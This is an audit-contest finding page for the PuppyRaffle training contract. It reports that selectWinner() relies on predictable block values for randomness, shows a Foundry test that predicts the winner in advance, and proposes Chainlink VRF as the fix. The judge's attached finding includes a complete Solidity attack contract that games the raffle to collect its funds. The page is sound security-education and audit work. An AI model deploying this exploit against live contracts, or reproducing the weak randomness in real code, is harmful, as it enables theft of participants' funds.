Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Predictable Randomness Allows Attacker to Guarantee Winning

365smile

Scope: src/PuppyRaffle.sol

Root + Impact

The selectWinner() function uses block.timestamp, block.difficulty, and msg.sender to generate random numbers. All these values are predictable or manipulable by miners/validators, allowing an attacker to guarantee they win the raffle.

Description

  • Normal behavior: The raffle should randomly select a winner from the pool of participants using unpredictable randomness.

  • The issue: The "random" values used (msg.sender, block.timestamp, block.difficulty) are all known or controllable. Anyone can calculate the winning index before calling selectWinner() by using the same formula.

function selectWinner() external {
require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");
require(players.length >= 4, "PuppyRaffle: Need at least 4 players");
// @> All inputs are predictable - msg.sender is chosen by caller
// @> block.timestamp and block.difficulty are known at call time
uint256 winnerIndex =
uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
address winner = players[winnerIndex];
}

Risk

Likelihood:

  • The attacker reads the current block values and calculates the winner for their address

  • The attacker can try different addresses until they find one that makes them win

  • Block proposers/validators have full control over block values

Impact:

  • 80% of all raffle funds stolen by attacker every round

  • Legitimate participants never win

  • NFT rarity can also be manipulated to always get legendary puppies

Proof of Concept

Explanation: The test calculates the winner index using the exact same formula as the contract BEFORE calling selectWinner(). After calling selectWinner(), the actual winner matches the prediction exactly, proving the randomness is fully predictable.

function testVuln2_WeakRandomness() public {
address[] memory players = new address[](4);
players[0] = playerOne;
players[1] = playerTwo;
players[2] = playerThree;
players[3] = playerFour;
puppyRaffle.enterRaffle{value: entranceFee * 4}(players);
vm.warp(block.timestamp + duration + 1);
vm.roll(block.number + 1);
// PREDICT winner using same formula BEFORE calling selectWinner
uint256 predictedWinnerIndex = uint256(
keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))
) % 4;
address predictedWinner = puppyRaffle.players(predictedWinnerIndex);
puppyRaffle.selectWinner();
// Prediction matches actual - randomness is predictable
assertEq(puppyRaffle.previousWinner(), predictedWinner);
}

Recommended Mitigation

Explanation: Use Chainlink VRF (Verifiable Random Function) which provides cryptographically secure randomness that cannot be predicted or manipulated by any party including miners.

+ import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.8/VRFConsumerBaseV2.sol";
- contract PuppyRaffle is ERC721, Ownable {
+ contract PuppyRaffle is ERC721, Ownable, VRFConsumerBaseV2 {
function selectWinner() external {
require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");
require(players.length >= 4, "PuppyRaffle: Need at least 4 players");
- uint256 winnerIndex = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
+ // Request random number from Chainlink VRF
+ uint256 requestId = vrfCoordinator.requestRandomWords(...);
}
+ function fulfillRandomWords(uint256 requestId, uint256[] memory randomWords) internal override {
+ uint256 winnerIndex = randomWords[0] % players.length;
+ // Complete winner selection with truly random number
+ }
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 5 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!